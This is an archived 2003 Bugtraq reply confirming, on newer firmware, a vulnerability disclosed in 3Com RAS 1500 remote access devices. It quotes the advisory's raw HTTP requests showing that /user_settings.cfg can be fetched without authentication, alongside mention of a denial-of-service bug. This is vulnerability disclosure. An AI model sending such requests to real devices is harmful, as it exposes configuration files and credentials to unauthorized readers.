lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <236099710.20030401151103@isgroup.com>
Date: Tue, 1 Apr 2003 15:11:03 +0200
From: Jan Kachlik <jkachlik@...roup.com>
To: bugtraq@...urityfocus.com
Subject: re:3com RAS 1500 Remote vulnerabilities.


Hi Piotr Chytla

>Synopsis:   3com RAS 1500 Remote vulnerabilities.
>Product:    3C433279A-US http://www.3com/ras1500
>Version:    Firmware X2.0.10
>
>URL:        http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
>Author:     Piotr Chytla <pch@...c.pl>
>Date:       February 27, 2003
>
>

I tested second bug on

SuperStack II Remote Access System 1500, Version: 2.5.0, 159,

and working...

>Issue:
>- ------
>
> 3com SuperStack II Remote Access System 1500 is telco device which
> provides access via BRI-ISDN/Analog to dialin users.
> It contains two remote vulnerabilities, first is Denial Of Service that
> leads to system crash, second can be used to read configuration files.

>
>2. Configuration file read
>
> Unauthorized user can read configuration and system files, using web
> interface on RAS 1500 .
>
>    GET /download.htm HTTP/1.0
>    HTTP/1.0 401 Unauthorized
>    WWW-Authenticate: Basic realm="RAS1500"
>    Content-Type: text/html
>    Server: Allegro-Software-RomPager/2.10
>
>    GET /user_settings.cfg HTTP/1.0
>    HTTP/1.0 200 OK
>    Content-Type: multipart
>    Date: Mon, 25 May 1998 00:26:38 GMT
>    Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
>    Content-Length: 1258
>    Server: Allegro-Software-RomPager/2.10
>    [..]
    
    content of user_setting.cfg


-- 
 Best regards,
  Jan Kachlik
  jkachlik@...roup.com
 
 +---------------------------------+
 ' Kachlik Jan                     '
 ' Security & Network Specialist   '
 ' InterSource Solutions Group     '
 ' Mathonova 25, 613 00 Brno CZ    '
 ' Mail: jkachlik@...roup.com      '
 ' Mail: jkachlik@...ktrack.com    '
 ' GSM:  +420.728.662.807          '
 ' ICQ:  #56618470                 '
 ' WebSite: http://www.isgroup.com '
 +---------------------------------+

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ